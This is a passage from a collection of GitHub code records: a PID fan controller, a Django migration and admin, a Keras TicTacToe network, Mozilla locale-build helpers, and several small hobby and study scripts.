The PWM value will be calculated from minPwm and\n maxPwm\n \"\"\"\n assert percentage >= 0.0 and percentage <= 1.0\n pwm = self.minPwm + self.range * percentage\n if dry_run:\n print(self.devPath, int(pwm))\n else:\n with open(self.devPath, 'w') as f:\n f.write(str(int(pwm)))\n\n def get_pressure_srcs(self):\n return self.press_srcs\n\nclass TempSensor:\n def __init__(self, devPath):\n self.devPath = devPath\n\n def read_temp(self):\n f = open(self.devPath, 'r')\n # integer type temperature in milli degrees\n temp = str(f.read()).strip()\n f.close()\n # convert to float degrees\n return int(temp)/1000.0\n\nclass CmdTempSensor:\n def __init__(self, temp_cmd):\n self.temp_cmd = temp_cmd\n\n def read_temp(self):\n completedCmd = subprocess.run(\n self.temp_cmd,\n check=True,\n shell=True,\n text=True,\n capture_output=True)\n # convert to float degrees\n return int(completedCmd.stdout)/1.0\n\nclass HeatPressureSrc:\n def __init__(self, name, path, temp_cmd, set_point, P, I, D, sample_interval):\n self.name = name\n self.path = path\n self.temp_cmd = temp_cmd\n self.set_point = set_point\n self.P = P\n self.I = I\n self.D = D\n self.sample_interval = sample_interval\n if self.temp_cmd is not None:\n self.temp_sensor = CmdTempSensor(temp_cmd)\n else:\n self.temp_sensor = TempSensor(path)\n self.pid_controller = PID(self.P, self.I, self.D,\n setpoint=self.set_point,\n output_limits=(0.0, 1.0),\n sample_time=self.sample_interval\n )\n\n def get_heat_pressure(self):\n temperature = self.temp_sensor.read_temp()\n heat_pressure = self.pid_controller(temperature)\n return heat_pressure\n\n def get_name(self):\n return self.name\n\ndef get_only_one_wildcard_match(wc_path):\n should_be_a_single_path = glob.glob(wc_path)\n assert len(should_be_a_single_path) == 1\n return should_be_a_single_path[0]\n\ndef instantiate_fan(cfg):\n name = cfg['name']\n wc_path = cfg['wildcard_path']\n min_pwm = cfg['min_pwm']\n max_pwm = cfg['max_pwm']\n press_srcs = cfg['heat_pressure_srcs']\n path = get_only_one_wildcard_match(wc_path)\n\n return PwmFan(name, path, min_pwm, max_pwm, press_srcs)\n\ndef instantiate_hp_src(cfg, sample_interval):\n name = cfg['name']\n PID_params = cfg['PID_params']\n if 'wildcard_path' in cfg:\n wc_path = cfg['wildcard_path']\n path = get_only_one_wildcard_match(wc_path)\n else:\n path = None\n temp_cmd = cfg['temp_cmd'] if 'temp_cmd' in cfg else None\n if (path or temp_cmd) is None:\n print(cfg)\n raise RuntimeError(\"Neither `temp_cmd` or `wildcard_path` exists\")\n\n return HeatPressureSrc(name = name, path = path,\n temp_cmd = temp_cmd,\n set_point = PID_params['set_point'],\n P = PID_params['P'],\n I = PID_params['I'],\n D = PID_params['D'],\n sample_interval = sample_interval\n )\nclass PID_fan_controller:\n def __init__(self, config_file):\n with open(config_file, 'r') as f:\n try:\n self.config = yaml.load(f, Loader=yaml.FullLoader)\n except yaml.YAMLError as exc:\n print(\"Error in loading the config file:\", CONFIG_FILE, '\\n',exc)\n exit(1)\n self.sample_interval = self.config['sample_interval']\n self.heat_pressure_srcs = [ instantiate_hp_src(hp_cfg, self.sample_interval) for hp_cfg in self.config[\"heat_pressure_srcs\"] ]\n self.fans = [ instantiate_fan(fan_config) for fan_config in self.config[\"fans\"] ]\n\n def run_loop(self, dry_run=False):\n while True:\n heat_pressures = {}\n for hp in self.heat_pressure_srcs:\n name = hp.get_name()\n pressure = hp.get_heat_pressure()\n heat_pressures[name] = pressure\n\n for fan in self.fans:\n press_srcs = fan.get_pressure_srcs()\n hp 
= [ heat_pressures[hp_src] for hp_src in press_srcs ]\n highest_pressure = max(hp)\n fan.set_speed(highest_pressure, dry_run)\n\n time.sleep(self.sample_interval)\n\n def override_fan_auto_control(self, override, dry_run=False):\n for fan in self.config['fans']:\n pwm_modes = fan['pwm_modes']\n path = get_only_one_wildcard_match(pwm_modes['pwm_mode_wildcard_path'])\n mode = pwm_modes['manual'] if override else pwm_modes['auto']\n if dry_run:\n print(path, mode)\n else:\n with open(path, 'w') as f:\n f.write(str(mode))\n\n def set_manual_fan_speed(self, fan_speed, dry_run=False):\n for fan in self.fans:\n fan.set_speed(fan_speed/100.0, dry_run)\n","repo_name":"ThunderMikey/pid_fan_controller","sub_path":"pid_fan_controller.py","file_name":"pid_fan_controller.py","file_ext":"py","file_size_in_byte":5644,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"68"} +{"seq_id":"73019453978","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('topic', '0034_topic_img1'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Daka',\n fields=[\n ('id', models.AutoField(db_index=True, serialize=False, primary_key=True)),\n ('date', models.CharField(max_length=500)),\n ('timestamp', models.DateTimeField(auto_now_add=True, null=True)),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n","repo_name":"kij8323/mynewspaper","sub_path":"topic/migrations/0035_daka.py","file_name":"0035_daka.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"34682699022","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nNeuralNet for the game of TicTacToe.\nAuthors: Evgeny Tyurin, github.com/evg-tyurin, github @suragnair @ozzi7, possibly others\n\nBased on the OthelloNNet by SourKream and Surag Nair.\n\nconv2d weights order:\n\"That's the tensorflow convention, the kernel shape is (kernel_height, kernel_width, input_channels, output_channels).\n(output_channels, input_channels, kernel_height, kernel_width)\nTo reverse it, you can always just get the value and transpose it appropriately,\ne.g. 
with filters = model.get_weights()[0][:, :, 0, :].transpose((2, 1, 0)).\"\n\n\"\"\"\n\nimport argparse\nfrom keras.models import *\nfrom keras.layers import *\nfrom keras.optimizers import *\n\n# game params\nBOARD_X=5\nBOARD_Y=5\nNOF_INPUT_PLANES=3\nNOF_POLICIES=25\nNOF_FILTERS=32\nNOF_VALUE_FILTERS=32\nNOF_POLICY_FILTERS=32\nNOF_FC_NEURONS_VAL_LAYER=32\nNOF_RES_LAYERS=6\nLEARNING_RATE=0.0001 # was 0.001\n\n\nclass TicTacToeNet:\n def __init__(self):\n self.input_boards = Input(shape=(BOARD_X, BOARD_Y, NOF_INPUT_PLANES)) # s: batch_size x board_x x board_y\n x = Conv2D(filters=NOF_FILTERS,\n kernel_size=(3,3),\n padding='same', activation='linear', use_bias=False,\n data_format=\"channels_last\")(self.input_boards)\n\n x = BatchNormalization(axis=3)(x) # axis -1 is equal to 3 here, means last dimension\n x = LeakyReLU()(x)\n for _ in range(NOF_RES_LAYERS):\n x = self.residual_layer(x, NOF_FILTERS,\n (3,3))\n self.value_head = self.value_head(x)\n self.policy_head = self.policy_head(x)\n\n self.model = Model(inputs=[self.input_boards], outputs=[self.policy_head, self.value_head])\n self.model.compile(loss=['categorical_crossentropy', 'mean_squared_error'], optimizer=Adam(LEARNING_RATE))\n #self.model.summary()\n\n def conv_layer(self, x, filters, kernel_size):\n x = Conv2D(\n filters=filters\n , kernel_size=kernel_size\n , padding='same'\n , activation='linear'\n , use_bias=False\n\n )(x)\n\n x = BatchNormalization(axis=3)(x)\n x = LeakyReLU()(x)\n\n return (x)\n\n def residual_layer(self, input_block, filters, kernel_size):\n \"\"\"\n The residual layer\n :param input_block: input of CNN\n :param filters: how many filters?\n :param kernel_size: the kernel of the CNN\n :return:\n \"\"\"\n x = self.conv_layer(input_block, filters, kernel_size)\n\n x = Conv2D(\n filters=filters\n , kernel_size=kernel_size\n , padding='same'\n , activation='linear'\n , use_bias=False\n\n )(x)\n\n x = BatchNormalization(axis=3)(x)\n x = add([input_block, x])\n x = LeakyReLU()(x)\n\n return (x)\n\n def value_head(self, x):\n \"\"\"\n The value head that will be optimized with the reward as the target\n Using tanh as the activation function.\n :param x: the input from the residual layer\n :return:\n \"\"\"\n x = Conv2D(\n filters=NOF_VALUE_FILTERS\n , kernel_size=(1,1)\n , padding='same'\n , activation='linear'\n , use_bias=False\n\n )(x)\n\n x = BatchNormalization(axis=3)(x)\n x = LeakyReLU()(x)\n x = Permute((3, 1, 2), input_shape=(5, 5, NOF_VALUE_FILTERS))(x)\n x = Flatten()(x)\n # noinspection PyPackageRequirements\n x = Dense(\n NOF_FC_NEURONS_VAL_LAYER\n , activation='linear'\n )(x)\n\n x = LeakyReLU()(x)\n x = Dense(\n 1\n , activation='tanh'\n , name='value_head'\n )(x)\n x = Dropout(0.1)(x)\n\n return (x)\n\n def policy_head(self, x):\n \"\"\"\n The policy head that will be optimized with the action prob as the target.\n Using softmax as the activation function.\n :param x: the input from the residual layer\n :return:\n \"\"\"\n x = Conv2D(\n filters = NOF_POLICY_FILTERS\n , kernel_size = (1,1)\n , padding = 'same'\n , activation='linear', use_bias=False)(x)\n\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n x = Permute((3,1,2), input_shape=(5,5,NOF_POLICY_FILTERS))(x)\n x = Flatten()(x)\n x = Dense( # this is equivalent to dense layer + softmax layer, but combined\n NOF_POLICIES\n , activation='softmax'\n , name ='policy_head'\n )(x)\n\n x = Dropout(0.1)(x)\n\n return (x)\n\n def dump_weights(self):\n f = open(\"weights.txt\", \"w\")\n for layer in self.model.layers:\n weights = layer.get_weights() 
# list of numpy arrays\n if weights: # if no weights\n for w in weights: # sometimes there is bias as well\n try:\n w2 = np.transpose(w, (3, 2, 0, 1)) # (3,..) = move that was last to first place\n np.savetxt(f, w2.flatten(order='C'), delimiter=',', newline=\" \")\n f.write(\"\\n\")\n\n except:\n np.savetxt(f, w.flatten(order='C'), delimiter=',', newline=\" \")\n f.write(\"\\n\")\n f.close()\n\n def calculate_loss(self):\n self.target_pis = tf.placeholder(tf.float32, shape=[None, NOF_POLICIES])\n self.target_vs = tf.placeholder(tf.float32, shape=[None])\n self.loss_pi = tf.losses.softmax_cross_entropy(self.target_pis, self.pi)\n self.loss_v = tf.losses.mean_squared_error(self.target_vs, tf.reshape(self.v, shape=[-1,]))\n self.total_loss = self.loss_pi + self.loss_v\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n self.train_step = tf.train.AdamOptimizer(self.args.lr).minimize(self.total_loss)","repo_name":"ozzi7/TicTacToe-DL-RL","sub_path":"Training/tictactoe_nn.py","file_name":"tictactoe_nn.py","file_ext":"py","file_size_in_byte":5969,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"1040886515","text":"colors = {\"background_color\": \"#99C4C8\",\n \"dark_sea\": \"#68A7AD\",\n \"light_yellow\": \"#EEE4AB\",\n \"peach\": \"#E5CB9F\",\n \"purple\": \"#533E85\"\n }\n\nfonts = {\n \"title_font\": (\"Roboto\", 40, \"bold\"),\n \"footer_font\": (\"Roboto\", 14, \"normal\"),\n \"button_font\": (\"Roboto\", 20, \"bold\")\n}\n","repo_name":"MarcinZ20/SortingAlgorithms","sub_path":"dev/ui/specs.py","file_name":"specs.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4362339864","text":"from paips2.core import Task\nimport numpy as np\nimport inspect\n\nclass CalculateMetrics(Task):\n def get_valid_parameters(self):\n return ['y_pred', 'y_target'], ['backend_library', 'metrics', 'labels']\n\n def process(self):\n preds = self.config['y_pred']\n targets = self.config['y_target']\n labels = self.config.get('labels')\n backend_library = self.config.get('backend_library','sklearn')\n metrics = self.config.get('metrics',['accuracy_score',\n 'confusion_matrix',\n 'f1_score',\n 'precision_score',\n 'recall_score',\n 'roc_curve',\n 'roc_auc_score',\n 'average_precision_score',\n 'precision_recall_curve'])\n results = {}\n targets = np.argmax(targets,axis=-1)\n if backend_library == 'sklearn':\n import sklearn.metrics as skm\n decisions = np.argmax(preds, axis=-1)\n for metric in metrics:\n m = getattr(skm, metric)\n m_signature = inspect.signature(m).parameters\n if labels is not None and 'labels' in m_signature:\n kwargs = {'labels': labels}\n else:\n kwargs = {}\n if 'y_pred' in m_signature:\n if 'average' in m_signature:\n for avg in ['micro','macro','weighted',None]:\n if avg == None:\n results[metric + '_perclass'] = m(targets, decisions, average=avg, **kwargs)\n else:\n results[metric+'_'+avg] = m(targets, decisions, average=avg, **kwargs)\n else:\n results[metric] = m(targets, decisions, **kwargs)\n else:\n if metric in ['roc_curve','roc_auc_score','average_precision_score','precision_recall_curve']:\n m_ = []\n for c in range(preds.shape[1]):\n targets_ = (targets == c).astype(np.int32)\n m_.append(m(targets_, preds[:,c], **kwargs))\n results[metric] = m_\n\n return 
results","repo_name":"mrpep/paips2","sub_path":"src/paips2/tasks/ml/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9037446830","text":"#!/usr/bin/env python\n# ***** BEGIN LICENSE BLOCK *****\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n# ***** END LICENSE BLOCK *****\n\"\"\"Localization.\n\"\"\"\n\nimport os\nfrom urlparse import urljoin\nimport sys\nfrom copy import deepcopy\n\nsys.path.insert(1, os.path.dirname(sys.path[0]))\n\nfrom mozharness.base.config import parse_config_file\nfrom mozharness.base.errors import PythonErrorList\nfrom mozharness.base.parallel import ChunkingMixin\n\n\n# LocalesMixin {{{1\nclass LocalesMixin(ChunkingMixin):\n def __init__(self, **kwargs):\n \"\"\" Mixins generally don't have an __init__.\n This breaks super().__init__() for children.\n However, this is needed to override the query_abs_dirs()\n \"\"\"\n self.abs_dirs = None\n self.locales = None\n self.gecko_locale_revisions = None\n self.l10n_revisions = {}\n\n def query_locales(self):\n if self.locales is not None:\n return self.locales\n c = self.config\n ignore_locales = c.get(\"ignore_locales\", [])\n additional_locales = c.get(\"additional_locales\", [])\n # List of locales can be set by using different methods in the\n # following order:\n # 1. \"locales\" buildbot property: a string of locale:revision separated\n # by space\n # 2. \"MOZ_LOCALES\" env variable: a string of locale:revision separated\n # by space\n # 3. self.config[\"locales\"] which can be either coming from the config\n # or from --locale command line argument\n # 4. 
using self.config[\"locales_file\"] l10n changesets file\n        locales = None\n\n        # Buildbot property\n        if hasattr(self, 'read_buildbot_config'):\n            self.read_buildbot_config()\n            if self.buildbot_config:\n                locales = self.buildbot_config['properties'].get(\"locales\")\n                if locales:\n                    self.info(\"Using locales from buildbot: %s\" % locales)\n                    locales = locales.split()\n        else:\n            self.info(\"'read_buildbot_config()' is missing, ignoring buildbot\"\n                      \" properties\")\n\n        # Environment variable\n        if not locales and \"MOZ_LOCALES\" in os.environ:\n            self.debug(\"Using locales from environment: %s\" %\n                       os.environ[\"MOZ_LOCALES\"])\n            locales = os.environ[\"MOZ_LOCALES\"].split()\n\n        # Command line or config\n        if not locales and c.get(\"locales\", None):\n            locales = c[\"locales\"]\n            self.debug(\"Using locales from config/CLI: %s\" % locales)\n\n        # parse locale:revision if set\n        if locales:\n            for l in locales:\n                if \":\" in l:\n                    # revision specified in locale string\n                    locale, revision = l.split(\":\", 1)\n                    self.debug(\"Using %s:%s\" % (locale, revision))\n                    self.l10n_revisions[locale] = revision\n            # clean up locale by removing revisions\n            locales = [l.split(\":\")[0] for l in locales]\n\n        if not locales and 'locales_file' in c:\n            locales_file = os.path.join(c['base_work_dir'], c['work_dir'],\n                                        c['locales_file'])\n            locales = self.parse_locales_file(locales_file)\n\n        if not locales:\n            self.fatal(\"No locales set!\")\n\n        for locale in ignore_locales:\n            if locale in locales:\n                self.debug(\"Ignoring locale %s.\" % locale)\n                locales.remove(locale)\n                if locale in self.l10n_revisions:\n                    del self.l10n_revisions[locale]\n\n        for locale in additional_locales:\n            if locale not in locales:\n                self.debug(\"Adding locale %s.\" % locale)\n                locales.append(locale)\n\n        if not locales:\n            return None\n        # both keys must be present in the config before chunking\n        if 'total_locale_chunks' in c and 'this_locale_chunk' in c:\n            self.debug(\"Pre-chunking locale list: %s\" % str(locales))\n            locales = self.query_chunked_list(locales,\n                                              c['this_locale_chunk'],\n                                              c['total_locale_chunks'],\n                                              sort=True)\n            self.debug(\"Post-chunking locale list: %s\" % locales)\n        self.locales = locales\n        return self.locales\n\n    def list_locales(self):\n        \"\"\" Stub action method.\n        \"\"\"\n        self.info(\"Locale list: %s\" % str(self.query_locales()))\n\n    def parse_locales_file(self, locales_file):\n        locales = []\n        c = self.config\n        platform = c.get(\"locales_platform\", None)\n\n        if locales_file.endswith('json'):\n            locales_json = parse_config_file(locales_file)\n            for locale in locales_json.keys():\n                if isinstance(locales_json[locale], dict):\n                    if platform and platform not in locales_json[locale]['platforms']:\n                        continue\n                    self.l10n_revisions[locale] = locales_json[locale]['revision']\n                else:\n                    # some other way of getting this?\n                    self.l10n_revisions[locale] = 'default'\n                locales.append(locale)\n        else:\n            locales = self.read_from_file(locales_file).split()\n        return locales\n\n    def run_compare_locales(self, locale, halt_on_failure=False):\n        dirs = self.query_abs_dirs()\n        env = self.query_l10n_env()\n        python = self.query_exe('python2.7')\n        compare_locales_error_list = list(PythonErrorList)\n        self.rmtree(dirs['abs_merge_dir'])\n        self.mkdir_p(dirs['abs_merge_dir'])\n        command = [python, 'mach', 'compare-locales',\n                   '--merge-dir', dirs['abs_merge_dir'],\n                   '--l10n-ini', os.path.join(dirs['abs_locales_src_dir'], 'l10n.ini'),\n                   '--l10n-base', dirs['abs_l10n_dir'], locale]\n        self.info(\"*** BEGIN compare-locales %s\" % locale)\n        status = self.run_command(command,\n                                  halt_on_failure=halt_on_failure,\n                                  env=env,\n                                  
cwd=dirs['abs_mozilla_dir'],\n error_list=compare_locales_error_list)\n self.info(\"*** END compare-locales %s\" % locale)\n return status\n\n def query_abs_dirs(self):\n if self.abs_dirs:\n return self.abs_dirs\n abs_dirs = super(LocalesMixin, self).query_abs_dirs()\n c = self.config\n dirs = {}\n dirs['abs_work_dir'] = os.path.join(c['base_work_dir'],\n c['work_dir'])\n # TODO prettify this up later\n if 'l10n_dir' in c:\n dirs['abs_l10n_dir'] = os.path.join(dirs['abs_work_dir'],\n c['l10n_dir'])\n if 'mozilla_dir' in c:\n dirs['abs_mozilla_dir'] = os.path.join(dirs['abs_work_dir'],\n c['mozilla_dir'])\n dirs['abs_locales_src_dir'] = os.path.join(dirs['abs_mozilla_dir'],\n c['locales_dir'])\n dirs['abs_compare_locales_dir'] = os.path.join(dirs['abs_mozilla_dir'],\n 'python', 'compare-locales',\n 'compare_locales')\n else:\n # Use old-compare-locales if no mozilla_dir set, needed\n # for clobberer, and existing mozharness tests.\n dirs['abs_compare_locales_dir'] = os.path.join(dirs['abs_work_dir'],\n 'compare-locales')\n\n if 'objdir' in c:\n if os.path.isabs(c['objdir']):\n dirs['abs_objdir'] = c['objdir']\n else:\n dirs['abs_objdir'] = os.path.join(dirs['abs_mozilla_dir'],\n c['objdir'])\n dirs['abs_merge_dir'] = os.path.join(dirs['abs_objdir'],\n 'merged')\n dirs['abs_locales_dir'] = os.path.join(dirs['abs_objdir'],\n c['locales_dir'])\n\n for key in dirs.keys():\n if key not in abs_dirs:\n abs_dirs[key] = dirs[key]\n self.abs_dirs = abs_dirs\n return self.abs_dirs\n\n # This requires self to inherit a VCSMixin.\n def pull_locale_source(self, hg_l10n_base=None, parent_dir=None, vcs='hg'):\n c = self.config\n if not hg_l10n_base:\n hg_l10n_base = c['hg_l10n_base']\n if parent_dir is None:\n parent_dir = self.query_abs_dirs()['abs_l10n_dir']\n self.mkdir_p(parent_dir)\n repos = []\n replace_dict = {}\n # This block is to allow for pulling buildbot-configs in Fennec\n # release builds, since we don't pull it in MBF anymore.\n if c.get(\"l10n_repos\"):\n if c.get(\"user_repo_override\"):\n replace_dict['user_repo_override'] = c['user_repo_override']\n for repo_dict in deepcopy(c['l10n_repos']):\n repo_dict['repo'] = repo_dict['repo'] % replace_dict\n repos.append(repo_dict)\n else:\n repos = c.get(\"l10n_repos\")\n self.vcs_checkout_repos(repos, tag_override=c.get('tag_override'))\n # Pull locales\n locales = self.query_locales()\n locale_repos = []\n if c.get(\"user_repo_override\"):\n hg_l10n_base = hg_l10n_base % {\"user_repo_override\": c[\"user_repo_override\"]}\n for locale in locales:\n tag = c.get('hg_l10n_tag', 'default')\n if self.l10n_revisions.get(locale):\n tag = self.l10n_revisions[locale]\n locale_repos.append({\n 'repo': \"%s/%s\" % (hg_l10n_base, locale),\n 'branch': tag,\n 'vcs': vcs\n })\n revs = self.vcs_checkout_repos(repo_list=locale_repos,\n parent_dir=parent_dir,\n tag_override=c.get('tag_override'))\n self.gecko_locale_revisions = revs\n\n def query_l10n_repo(self):\n # Find the name of our repository\n mozilla_dir = self.config['mozilla_dir']\n repo = None\n for repository in self.config['repos']:\n if repository.get('dest') == mozilla_dir:\n repo = repository['repo']\n break\n return repo\n\n# GaiaLocalesMixin {{{1\nclass GaiaLocalesMixin(object):\n gaia_locale_revisions = None\n\n def pull_gaia_locale_source(self, l10n_config, locales, base_dir):\n root = l10n_config['root']\n # urljoin will strip the last part of root if it doesn't end with \"/\"\n if not root.endswith('/'):\n root = root + '/'\n vcs = l10n_config['vcs']\n env = l10n_config.get('env', {})\n 
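# worked example of the urljoin note above (hypothetical URLs):\n        #   urljoin('https://hg.example.org/gaia-l10n', 'de')  -> 'https://hg.example.org/de'\n        #   urljoin('https://hg.example.org/gaia-l10n/', 'de') -> 'https://hg.example.org/gaia-l10n/de'\n        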
repos = []\n        for locale in locales:\n            repos.append({\n                'repo': urljoin(root, locale),\n                'dest': locale,\n                'vcs': vcs,\n                'env': env,\n            })\n        self.gaia_locale_revisions = self.vcs_checkout_repos(repo_list=repos, parent_dir=base_dir)\n\n\n# __main__ {{{1\n\nif __name__ == '__main__':\n    pass\n","repo_name":"mozilla/positron","sub_path":"testing/mozharness/mozharness/mozilla/l10n/locales.py","file_name":"locales.py","file_ext":"py","file_size_in_byte":11518,"program_lang":"python","lang":"en","doc_type":"code","stars":553,"dataset":"github-code","pt":"68"} +{"seq_id":"24952404122","text":"import json\n\ndef main():\n    print(\"Room Create (capitalization only required on description and items)\")\n    room = {}\n    room['name'] = input('NAME: ').title()\n    room[\"description\"] = input('\\nDescription:\\n\\t')\n    print(\"ENTER NAME OF CONNECTING LOCATIONS OR BLANK FOR NONE\")\n    room[\"north\"] = input('Room North: ').title()\n    room[\"south\"] = input('Room South: ').title()\n    room[\"east\"] = input('Room East: ').title()\n    room[\"west\"] = input('Room West: ').title()\n    room['npc'] = []\n    room['items'] = []\n\n    conv_direct(room,'north')\n    conv_direct(room,'south')\n    conv_direct(room,'east')\n    conv_direct(room,'west')\n\n    npcs = ''\n    while not npcs.isdigit():\n        try:\n            npcs = input('how many npcs? ')\n        except:\n            continue\n    for i in range(int(npcs)):\n        room['npc'].append(input('Name of npc: '))\n\n    items = ''\n    while not items.isdigit():\n        try:\n            items = input('How many items? ')\n        except:\n            continue\n    for i in range(int(items)):\n        room['items'].append(input('name of item: '))\n\n    for key, value in room.items():\n        print(key, value)\n\n    file = '..\\\\rooms\\\\' + room['name'] + '.json'\n    with open(file, 'w') as f:\n        save = json.dumps(room)\n        f.write(save)\n\ndef conv_direct(room, direction):\n    if room[direction] == '':\n        room[direction] = None\n\nmain()\ninput()\n","repo_name":"ksmeeks0001/Text-Adventure-Generator","sub_path":"command_line_editer/json_room_create.py","file_name":"json_room_create.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"18228813613","text":"# A quick study of multithreading and multiprocessing, to understand how A3C is implemented\nimport multiprocessing as mp\nimport threading as td\nimport time\nimport gym\nimport numpy as np\n\ndef job(q):\n    res = 0\n    for i in range(1000000):\n        res += i + i**2 + i**3\n    q.put(res) # queue\n\ndef multicore():\n    q = mp.Queue()\n    p1 = mp.Process(target=job, args=(q,))\n    p2 = mp.Process(target=job, args=(q,))\n    p1.start()\n    p2.start()\n    p1.join()\n    p2.join()\n    res1 = q.get()\n    res2 = q.get()\n    print('multicore:',res1 + res2)\n\ndef normal():\n    res = 0\n    for _ in range(2):\n        for i in range(1000000):\n            res += i + i**2 + i**3\n    print('normal:', res)\n\n\ndef multithread():\n    q = mp.Queue() # threads can share the same multiprocessing Queue that processes use\n    t1 = td.Thread(target=job, args=(q,))\n    t2 = td.Thread(target=job, args=(q,))\n    t1.start()\n    t2.start()\n    t1.join()\n    t2.join()\n    res1 = q.get()\n    res2 = q.get()\n    print('multithread:', res1 + res2)\n\ndef job1(x):\n    return x*x\n\n\ndef multicore1():\n    pool = mp.Pool(processes=10)\n    res = pool.map(job1, range(10))\n    print(res)\n\nclass Agent():\n    def __init__(self,env=None):\n        self.num_actions = env.action_space.n\n    \n\ndef env1(env_name):\n    env = gym.make(env_name)\n    obs = env.reset()\n    num_actions = env.action_space.n\n    sum_r=0\n    while True:\n        action = np.random.choice(list(range(num_actions)))\n        obs_,rew,done,info = env.step(action)\n        print(env_name,\"reward\",rew)\n        sum_r += rew\n        if done:\n            
print(env_name,\"reward\",sum_r)\n break\n return sum_r\n\n\n\ndef multienv():\n num_env = mp.cpu_count()-20\n input_name = ['MsPacman-v0' for i in range(num_env)]\n pool = mp.Pool(processes=num_env)\n res = pool.map(env1,input_name)\n print(res)\n#MsPacman-v0\n\nif __name__ == '__main__':\n st = time.time()\n normal()\n st1 = time.time()\n print('normal time:', st1 - st)\n multithread()\n st2 = time.time()\n print('multithread time:', st2 - st1)\n multicore1()\n st3 = time.time()\n print('multicore time:', st3 - st2)\n multienv()\n","repo_name":"kangyongxin/GBMRcode","sub_path":"Base/multiprocessing_learning.py","file_name":"multiprocessing_learning.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70007964377","text":"import sys\n\nstacks = [[] for i in range(10)]\n\ndef add_crates(line):\n for i in range(len(line)):\n if line[i].isupper():\n stacks[i // 4].append(line[i])\n\n\ndef process_move(amt, src, dest):\n moved = []\n for i in range(amt):\n crate = stacks[src - 1].pop(0)\n moved.append(crate)\n \n moved.reverse()\n for move in moved:\n stacks[dest - 1].insert(0, move)\n\n\ndef process_line(line):\n words = line.split()\n process_move(int(words[1]), int(words[3]), int(words[5]))\n\nfirstPart = True\nfor line in sys.stdin:\n if firstPart:\n if len(line) < 2:\n firstPart = False\n else:\n add_crates(line[:-1])\n else:\n process_line(line[:-1])\n\nfor s in stacks:\n if len(s) > 0:\n print(s[0], end=\"\")\nprint()\n\n","repo_name":"IanFinlayson/advent-of-code-2022","sub_path":"05/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29404959304","text":"from django.utils.translation import ugettext_lazy as _\nfrom django.contrib import admin\nfrom reversion.admin import VersionAdmin\nfrom lecture.models import Lecture, LectureSchedule, LectureApplication\n\n\nclass InlineScheduleAdmin(admin.TabularInline):\n model = LectureSchedule\n fieldsets = (\n ('', {\n 'fields': ('start_time', 'end_time', 'day_of_week',)\n }),\n )\n\n\n@admin.register(Lecture)\nclass LectureAdmin(VersionAdmin):\n list_display = (\n 'pk', 'name', 'lecturer', 'classroom', 'start_date', 'end_date',\n 'is_registration_open', 'external_registration_url', 'created_at',\n )\n list_filter = (\n 'classroom', ('lecturer', admin.RelatedOnlyFieldListFilter),\n 'is_registration_open', 'start_date', 'created_at',\n )\n fieldsets = (\n (_('Lecture Information'), {\n 'fields': (\n 'name', 'description', 'poster', 'lecturer',\n ('classroom', 'is_registration_open'), 'external_registration_url'\n )\n }),\n (_('Dates'), {\n 'fields': (('start_date', 'end_date'),)\n }),\n (_('Stamps'), {\n 'fields': (('created_at', 'updated_at'),)\n }),\n )\n readonly_fields = ('created_at', 'updated_at')\n search_fields = ('name', 'classroom', 'lecturer')\n inlines = [\n InlineScheduleAdmin\n ]\n\n\n@admin.register(LectureSchedule)\nclass LectureScheduleAdmin(VersionAdmin):\n list_display = ('pk', 'lecture', 'start_time', 'end_time', 'day_of_week',)\n list_filter = ()\n fieldsets = (\n ('', {'fields': ('lecture', ('start_time', 'end_time', 'day_of_week'),)}),\n )\n\n\n@admin.register(LectureApplication)\nclass LectureApplicationAdmin(VersionAdmin):\n list_display = ('pk', 'lecture', 'user', 'is_approved', 'created_at',)\n list_filter = (('lecture', admin.RelatedOnlyFieldListFilter), 'is_approved',)\n fieldsets = (\n 
(_('Application'), {\n 'fields': (('lecture', 'user'), 'is_approved',)\n }),\n (_('Stamps'), {\n 'fields': (('created_at',),)\n }),\n )\n search_fields = ('user__email', 'user__first_name', 'user__last_name',)\n readonly_fields = ('created_at',)\n","repo_name":"itugnu/website","sub_path":"lecture/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"68"} +{"seq_id":"27742800300","text":"import shutil\nimport os\nimport numpy as np\nimport pytest\nfrom autode.path import Path\nfrom autode.neb import NEB\nfrom autode.values import Distance, ForceConstant\nfrom autode.neb.ci import Images, CImages, Image\nfrom autode.neb.idpp import IDPP\nfrom autode.species.molecule import Species, Molecule\nfrom autode.species.molecule import Reactant\nfrom autode.neb.neb import get_ts_guess_neb\nfrom autode.neb.original import energy_gradient\nfrom autode.atoms import Atom\nfrom autode.geom import are_coords_reasonable\nfrom autode.input_output import xyz_file_to_atoms\nfrom autode.utils import 